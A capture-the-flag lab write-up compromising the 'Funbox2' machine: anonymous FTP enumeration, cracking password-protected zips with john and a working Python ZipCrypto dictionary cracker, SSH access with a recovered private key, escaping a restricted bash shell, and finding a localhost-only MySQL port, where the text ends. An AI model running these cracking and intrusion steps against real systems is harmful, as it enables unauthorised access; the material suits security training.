Pwned Date - 27th Jun 2022

Enumeration

┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.201.107 -p 21,22,80

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Straightforward scan: three services, and the FTP daemon accepts anonymous logins and serves a password-protected-looking zip archive per user. Let's pull every file off the FTP share before touching anything else (a recursive FTP client such as wget will grab the whole listing in one go).

┌──(kali㉿VirtualBox)-[~]
└─$ ftp 192.168.201.107 -p 21
Connected to 192.168.201.107.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.201.107]
Name (192.168.201.107:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 123

After downloading all the zip files it turns out every one of them is password-protected.

Exploitation

Let's run each archive through zip2john and throw rockyou.txt at the resulting hash with john. Only tom.zip and cathrine.zip fall to the wordlist; both contain an id_rsa SSH private key:

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ zip2john tom.zip > tom.hash

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)     
1g 0:00:00:00 DONE (2022-06-27 04:14) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿VirtualBox)-[~/ftp]
└─$ zip2john cathrine.zip > cathrine.hash

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt cathrine.hash
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
catwoman         (cathrine.zip/id_rsa)     
1g 0:00:00:00 DONE (2022-06-27 04:19) 100.0g/s 409600p/s 409600c/s 409600C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
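What john's PKZIP mode does above is a plain dictionary attack against ZipCrypto, the traditional PKWARE zip cipher: the three 32-bit keys are derived from the password, and a 12-byte encryption header ends with a check byte (the high byte of the entry's CRC) that lets a wrong candidate be rejected almost for free. The following is an added example, not code from the writeup or from john: it builds a small ZipCrypto-encrypted archive in memory with the standard library, then runs a constructed wordlist against it the way zip2john+john did. The private-key text, the wordlist and the entry name are constructed placeholders; the password "iubire" is the one cracked above.

```python
"""Dictionary attack on a ZipCrypto (traditional PKWARE) protected archive.

Added example, not from the writeup: it builds a one-entry encrypted zip in
memory (standard library only, so it runs offline) and then does what
zip2john+john did: tries each candidate password until one decrypts the entry.
"""
import io
import os
import struct
import zipfile
import zlib


def _crc_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _crc_table()


class ZipCrypto:
    """Traditional PKWARE stream cipher; three 32-bit keys seeded from the password."""

    def __init__(self, password: bytes):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        k = self.k
        k[0] = (k[0] >> 8) ^ _TABLE[(k[0] ^ b) & 0xFF]
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = (k[2] >> 8) ^ _TABLE[(k[2] ^ (k[1] >> 24)) & 0xFF]

    def encrypt(self, plaintext: bytes) -> bytes:
        out = bytearray()
        for p in plaintext:
            t = self.k[2] | 2
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)  # keystream advances on the plaintext byte
        return bytes(out)


def make_encrypted_zip(name: str, data: bytes, password: bytes) -> bytes:
    """Write a one-entry, stored (uncompressed), ZipCrypto-encrypted archive."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes plus the CRC's high byte, which is the
    # only password check the format offers (1 in 256 wrong passwords slips past it).
    header = os.urandom(11) + bytes([(crc >> 24) & 0xFF])
    body = ZipCrypto(password).encrypt(header + data)
    fname = name.encode()
    flags, method = 0x0001, 0                      # bit 0 = encrypted, method 0 = stored
    dostime, dosdate = 0, (40 << 9) | (7 << 5) | 25  # 2020-07-25 in MS-DOS encoding
    local = struct.pack("<4sHHHHHLLLHH", b"PK\x03\x04", 20, flags, method, dostime, dosdate,
                        crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<4sHHHHHHLLLHHHHHLL", b"PK\x01\x02", 20, 20, flags, method, dostime,
                          dosdate, crc, len(body), len(data), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<4sHHHHLLH", b"PK\x05\x06", 0, 0, 1, 1, len(central),
                       len(local) + len(body), 0)
    return local + body + central + eocd


def crack_zip(zip_bytes: bytes, wordlist):
    """Return (password, plaintext) for the first candidate that decrypts the first entry."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for candidate in wordlist:
            try:
                data = zf.read(name, pwd=candidate.encode())
            except RuntimeError:          # check byte mismatch: definitely wrong
                continue
            except zipfile.BadZipFile:    # check byte matched by chance, CRC did not
                continue
            return candidate, data
    return None, None


# Constructed sample data: a stand-in for tom.zip/id_rsa and a tiny wordlist.
SECRET = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed placeholder)\n"
          b"-----END OPENSSH PRIVATE KEY-----\n")
WORDLIST = ["123456", "password", "catwoman", "iubire", "letmein"]
SAMPLE_ZIP = make_encrypted_zip("id_rsa", SECRET, b"iubire")


def demo():
    return crack_zip(SAMPLE_ZIP, WORDLIST)


if __name__ == "__main__":
    pw, data = demo()
    print(f"{pw!r} -> {data[:35]!r}")
```

The one-byte check is why rockyou finishes in seconds: 255 of every 256 candidates are thrown out after decrypting 12 bytes, and the rest fail the CRC. john does the same thing several orders of magnitude faster. Archives made with WinZip-style AES encryption (PBKDF2-derived keys, HMAC check) are a different hash type and are far slower to attack; this code does not handle them.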

After unzipping with the cracked passwords, chmod the id_rsa keys to 400 (ssh refuses to use a private key that other users can read) and try each against its matching account.

┌──(kali㉿VirtualBox)-[~/ftp/tom_cat]
└─$ ll
total 16K
-rw-r--r-- 1 kali kali 1.5K Jul 25  2020 cathrine.zip
-rw------- 1 kali kali 1.7K Jul 25  2020 cat_id_rsa
-rw------- 1 kali kali 1.7K Jul 25  2020 tom_id_rsa
-rw-r--r-- 1 kali kali 1.5K Jul 25  2020 tom.zip
                                                                                         
┌──(kali㉿VirtualBox)-[~/ftp/tom_cat]
└─$ chmod 400 cat_id_rsa 
                                                                                         
┌──(kali㉿VirtualBox)-[~/ftp/tom_cat]
└─$ chmod 400 tom_id_rsa  

Only tom's key gets us a shell; the server closes the connection when we present cathrine's key.

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ ssh cathrine@192.168.201.107 -i cat_id_rsa
Connection closed by 192.168.201.107 port 22
┌──(kali㉿VirtualBox)-[~/ftp]
└─$ ssh tom@192.168.201.107 -i tom_id_rsa
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-117-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/advantage>

  System information as of Mon Jun 27 08:24:15 UTC 2022

  System load:  0.04              Processes:             165
  Usage of /:   74.4% of 4.37GB   Users logged in:       0
  Memory usage: 37%               IP address for ens256: 192.168.201.107
  Swap usage:   0%

30 packages can be updated.
0 updates are security updates.

Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings

Last login: Mon Jun 27 08:23:29 2022 from 192.168.49.201
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@funbox2:~$ whoami
tom

tom@funbox2:~$ cat local.txt
eb085f25b13ee4c11e0284537012b007

Privilege Escalation

Moving around fails: tom's login shell is rbash, a restricted bash that refuses cd, commands containing a slash, changes to PATH and output redirection. The restriction is only as strong as what is left on PATH, and plain bash is still there, so spawning it drops us into an unrestricted shell.

tom@funbox2:~$ cd ..
-rbash: cd: restricted

tom@funbox2:~$ bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@funbox2:~$ cd ..
tom@funbox2:/home$ 

netstat shows something listening on 3306, the MySQL/MariaDB default port, but bound to 127.0.0.1 only, so it is reachable from the box itself and would never have shown up in the external scan.

tom@funbox2:~$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -